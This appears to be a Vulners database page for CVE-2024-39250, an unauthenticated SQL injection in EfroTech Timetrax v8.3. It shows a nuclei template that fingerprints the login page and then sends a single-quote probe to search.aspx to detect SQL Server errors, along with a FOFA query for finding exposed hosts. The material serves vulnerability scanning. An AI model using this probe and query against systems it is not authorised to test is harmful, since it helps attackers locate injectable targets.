Lucene search
K

EfroTech Timetrax v8.3 - Sql Injection

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 21 Views

EfroTech Timetrax v8.3 Sql Injection via unauthenticated q paramete

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-39250
13 Jul 202420:31
circl
CNNVD
EfroTech Timetrax 安全漏洞
22 Jul 202400:00
cnnvd
CVE
CVE-2024-39250
22 Jul 202400:00
cve
Cvelist
CVE-2024-39250
22 Jul 202400:00
cvelist
GithubExploit
Exploit for SQL Injection in Efrotech Timetrax
13 Jul 202420:29
githubexploit
NVD
CVE-2024-39250
22 Jul 202420:15
nvd
OSV
CVE-2024-39250
22 Jul 202420:15
osv
Positive Technologies
PT-2024-28411 · Efrotech · Efrotech Timetrax
22 Jul 202400:00
ptsecurity
RedhatCVE
CVE-2024-39250
9 Jan 202609:33
redhatcve
Vulnrichment
CVE-2024-39250
22 Jul 202400:00
vulnrichment
Rows per page
id: CVE-2024-39250

info:
  name: EfroTech Timetrax v8.3 - Sql Injection
  author: s4e-io,efran
  severity: high
  description: |
    EfroTech Timetrax v8.3 was discovered to contain an unauthenticated SQL injection vulnerability via the q parameter in the search web interface.
  impact: |
    Unauthenticated attackers can execute SQL injection attacks to extract or modify sensitive timetrax database information.
  remediation: |
    Update EfroTech Timetrax to a version later than v8.3 that patches the SQL injection vulnerability.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2024-39250
    - https://www.tenable.com/cve/CVE-2024-39250
    - https://github.com/efrann/CVE-2024-39250
    - https://vuldb.com/?id.272268
  classification:
    epss-score: 0.04927
    epss-percentile: 0.91081
  metadata:
    vendor: efroTech
    product: timetrax
    fofa-query: icon_hash="-661694518"
  tags: cve,cve2024,sqli,timetrax,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /Login.aspx HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body,"TimeTrax - Cloud HR Software")'
          - 'contains(content_type, "text/html")'
          - "status_code == 200"
        condition: and
        internal: true

  - raw:
      - |
        GET /search.aspx?q=' HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"Incorrect syntax near","Unclosed quotation mark after the character string")'
          - 'contains(content_type, "text/html")'
          - "status_code == 500"
        condition: and
# digest: 490a0046304402200a4f9a3e7d29d5670fcc5ef4caf1cfbb307609c7e3ac1bedf2c306331cab140502203e775794e9e40a140c852e1d508d2bd7c5d6e113c667074bbb16156b192c7184:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.04927
SSVC
21